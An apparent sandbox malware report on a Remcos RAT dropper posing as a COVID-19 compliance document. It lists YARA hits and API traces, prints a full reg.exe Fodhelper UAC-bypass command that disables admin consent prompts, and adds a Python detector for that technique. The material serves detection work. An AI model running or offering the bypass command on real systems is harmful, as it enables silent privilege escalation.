              Source: Yara match | File source: 20.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 12.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE

              System Summary:

              Malicious sample detected (through community Yara rule)
              Source: 00000014.00000002.420518923.0000000010540000.00000040.00000001.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Author: unknown
              Source: 00000017.00000002.435351745.0000000010540000.00000040.00000001.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Author: unknown
              Source: 0000000C.00000002.494954469.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Remcos Payload Author: kevoreilly
              Source: 0000000C.00000002.494954469.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Author: unknown
              Source: 00000017.00000002.433986384.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Remcos Payload Author: kevoreilly
              Source: 00000017.00000002.433986384.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Author: unknown
              Source: 0000000C.00000002.498610658.0000000010540000.00000040.00000001.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Author: unknown
              Source: 00000014.00000002.413656142.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Remcos Payload Author: kevoreilly
              Source: 00000014.00000002.413656142.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Author: unknown
              Source: 23.2.ieinstal.exe.10540000.2.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
              Source: 23.2.ieinstal.exe.10540000.2.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
              Source: 20.2.ieinstal.exe.10540000.2.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
              Source: 20.2.ieinstal.exe.10540000.2.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
              Source: 23.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Remcos Payload Author: kevoreilly
              Source: 23.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
              Source: 12.2.ieinstal.exe.10540000.2.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
              Source: 20.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Remcos Payload Author: kevoreilly
              Source: 20.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
              Source: 23.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Remcos Payload Author: kevoreilly
              Source: 23.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
              Source: 12.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Remcos Payload Author: kevoreilly
              Source: 12.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
              Source: 12.2.ieinstal.exe.10540000.2.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
              Source: 20.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Remcos Payload Author: kevoreilly
              Source: 20.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
              Source: 12.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Remcos Payload Author: kevoreilly
              Source: 12.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
              Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 12_2_0040D2A6 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,SetEvent,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,GetTickCount,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$a
llocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,URLDownloadToFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,OpenClipboard,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,?c_str@?$basic_string@GU?$char_trai12_2_0040D2A6
              Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 12_2_0040D2A6 12_2_0040D2A6
              Source: C:\Windows\SysWOW64\notepad.exe | Code function: String function: 50484224 appears 50 times
              Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: String function: 00413E72 appears 49 times
              Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: String function: 0041203B appears 31 times
              Source: Customer Report on COVID-19 Non-Complaince. Doc.exe | Static PE information: invalid certificate
              Source: Customer Report on COVID-19 Non-Complaince. Doc.exe | Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
              Source: Xbuhnek.exe.0.dr | Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
              Source: unknown | Process created: C:\Windows\SysWOW64\reg.exe REG ADD 'HKCU\SOFTWARE\Classes\ms-settings\shell\open\command' /t REG_SZ /d 'C:\windows\system32\cmd.exe /c REG ADD HKLM\software\microsoft\windows\currentversion\policies\system /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f' /f
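The reg.exe command line above is the Fodhelper UAC bypass that the Sigma signature in the overview refers to: fodhelper.exe auto-elevates and resolves its handler through HKCU\Software\Classes\ms-settings\shell\open\command, so a command written there runs with high integrity, and here that command in turn sets ConsentPromptBehaviorAdmin to 0 so later elevations no longer prompt. As an added example (neither the Sigma rule the sandbox matched nor Joe Sandbox code), the Python below flags both behaviours in Sysmon-shaped process-creation and registry events; the events, the user SID, the child command line and the registry writes are constructed for illustration, with only event 0 taken from the report.

```python
r"""Flag the Fodhelper-style UAC bypass and UAC prompt tampering in host telemetry.

Added example for this report; it is neither Joe Sandbox code nor the Sigma
rule the sandbox matched. It covers the two behaviours in the recorded reg.exe
command line: a handler written under
HKCU\Software\Classes\ms-settings\shell\open\command (which an auto-elevated
fodhelper.exe resolves and executes) and ConsentPromptBehaviorAdmin forced to
0. Events are constructed, Sysmon-shaped dicts (EventID 1 = process create,
EventID 13 = registry value set); the SID, the child command line and the
registry events are assumptions, not from the report.
"""
import re
from typing import Dict, List

# The per-user class key fodhelper.exe resolves: HKCU as typed by the attacker,
# or the same path under HKU\<SID> as Sysmon records it.
MS_SETTINGS_CMD = re.compile(
    r"(?:hkcu|hkey_current_user|hku\\[^\\]+)\\software\\classes\\ms-settings\\shell\\open\\command",
    re.I,
)
# "... /v ConsentPromptBehaviorAdmin ... /d 0 ..." on a reg.exe command line.
CPBA_REG_ADD = re.compile(r"consentpromptbehavioradmin\b.*?/d\s+0x?0*(?:\s|$)", re.I)
# The same value observed as a registry write of DWORD zero.
CPBA_KEY = re.compile(r"\\policies\\system\\consentpromptbehavioradmin$", re.I)
ZERO_DWORD = re.compile(r"dword\s*\(0x0+\)", re.I)


def normalize(cmd: str) -> str:
    """Drop the quoting styles reg.exe accepts and collapse whitespace so the
    nested 'cmd.exe /c REG ADD ...' payload is matched like the outer command."""
    return re.sub(r"\s+", " ", cmd.replace('"', "").replace("'", "")).strip()


def evaluate(ev: Dict[str, object]) -> List[str]:
    """Return detection tags for one event (empty list when it is benign)."""
    tags: List[str] = []
    if ev.get("EventID") == 1:
        cmd = normalize(str(ev.get("CommandLine", "")))
        if MS_SETTINGS_CMD.search(cmd):
            tags.append("fodhelper_ms_settings_hijack")
        if CPBA_REG_ADD.search(cmd):
            tags.append("uac_admin_prompt_disabled")
    elif ev.get("EventID") == 13:
        target = str(ev.get("TargetObject", ""))
        if MS_SETTINGS_CMD.search(target):
            tags.append("fodhelper_ms_settings_hijack")
        if CPBA_KEY.search(target) and ZERO_DWORD.search(str(ev.get("Details", ""))):
            tags.append("uac_admin_prompt_disabled")
    return tags


def scan(events: List[Dict[str, object]]) -> List[dict]:
    """Evaluate a batch and keep only the events that produced tags."""
    out = []
    for i, ev in enumerate(events):
        tags = evaluate(ev)
        if tags:
            out.append({"index": i, "EventID": ev.get("EventID"), "tags": tags})
    return out


# Constructed sample events. Only event 0 reproduces a command line from the report.
SAMPLE_EVENTS: List[Dict[str, object]] = [
    {"EventID": 1, "Image": r"C:\Windows\SysWOW64\reg.exe",
     "CommandLine": r"REG ADD 'HKCU\SOFTWARE\Classes\ms-settings\shell\open\command' /t REG_SZ "
                    r"/d 'C:\windows\system32\cmd.exe /c REG ADD HKLM\software\microsoft\windows"
                    r"\currentversion\policies\system /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f' /f"},
    {"EventID": 1, "Image": r"C:\Windows\System32\cmd.exe",  # assumed child once fodhelper.exe fires
     "CommandLine": r"C:\windows\system32\cmd.exe /c REG ADD HKLM\software\microsoft\windows"
                    r"\currentversion\policies\system /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f"},
    {"EventID": 1, "Image": r"C:\Windows\System32\reg.exe",  # benign file-association change
     "CommandLine": r'reg ADD "HKCU\Software\Classes\.txt\shell\open\command" /t REG_SZ /d "notepad.exe %1" /f'},
    {"EventID": 13, "EventType": "SetValue",  # assumed SID
     "TargetObject": r"HKU\S-1-5-21-1234567890-1234567890-1234567890-1001\Software\Classes"
                     r"\ms-settings\shell\open\command\(Default)",
     "Details": r"C:\windows\system32\cmd.exe /c ..."},
    {"EventID": 13, "EventType": "SetValue",
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin",
     "Details": "DWORD (0x00000000)"},
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(hit)
```

The registry-event path matters in practice: the first REG ADD is often hidden inside an obfuscated launcher and never appears as a clean command line, but the write to the ms-settings handler key itself cannot be avoided, so the key-based match is the more durable of the two.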
              Source: 00000014.00000002.420518923.0000000010540000.00000040.00000001.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 00000017.00000002.435351745.0000000010540000.00000040.00000001.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 0000000C.00000002.494954469.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
              Source: 0000000C.00000002.494954469.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 00000017.00000002.433986384.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
              Source: 00000017.00000002.433986384.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 0000000C.00000002.498610658.0000000010540000.00000040.00000001.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 00000014.00000002.413656142.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
              Source: 00000014.00000002.413656142.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: C:\Users\user\AppData\Local\hubX.url, type: DROPPEDMatched rule: Methodology_Shortcut_HotKey author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: C:\Users\user\AppData\Local\hubX.url, type: DROPPEDMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: C:\Users\user\AppData\Local\hubX.url, type: DROPPEDMatched rule: Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/ItsReallyNick/status/1176229087196696577, score = 27.09.2019
              Source: 23.2.ieinstal.exe.10540000.2.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 23.2.ieinstal.exe.10540000.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 20.2.ieinstal.exe.10540000.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 20.2.ieinstal.exe.10540000.2.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 23.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
              Source: 23.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 12.2.ieinstal.exe.10540000.2.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 20.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
              Source: 20.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 23.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
              Source: 23.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 12.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
              Source: 12.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 12.2.ieinstal.exe.10540000.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 20.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
              Source: 20.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 12.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
              Source: 12.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@21/9@6/7
              Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 12_2_0040EC0F GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,12_2_0040EC0F
              Source: C:\Windows\SysWOW64\notepad.exe | Code function: 6_2_5048784E GetDiskFreeSpaceA,6_2_5048784E
              Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 12_2_00409A2F GetModuleFileNameW,??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,CloseHandle,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@0@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,Process32NextW,??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@ABV12@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,CloseHandle,??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIPBGI@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,wcslen,?replace@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@IIPBG@Z,??8std@@YA_NPBGABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,CreateMutexA,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,CloseHandle,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,12_2_00409A2F
              Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 12_2_00409D02 FindResourceA,LoadResource,LockResource,SizeofResource,12_2_00409D02
              Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 12_2_00411927 OpenSCManagerW,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,OpenServiceW,CloseServiceHandle,ChangeServiceConfigW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,12_2_00411927
              Source: C:\Users\user\Desktop\Customer Report on COVID-19 Non-Complaince. Doc.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\Xbuhvsl[1]
              Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Mutant created: \Sessions\1\BaseNamedObjects\winon-9DYKLX
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6948:120:WilError_01
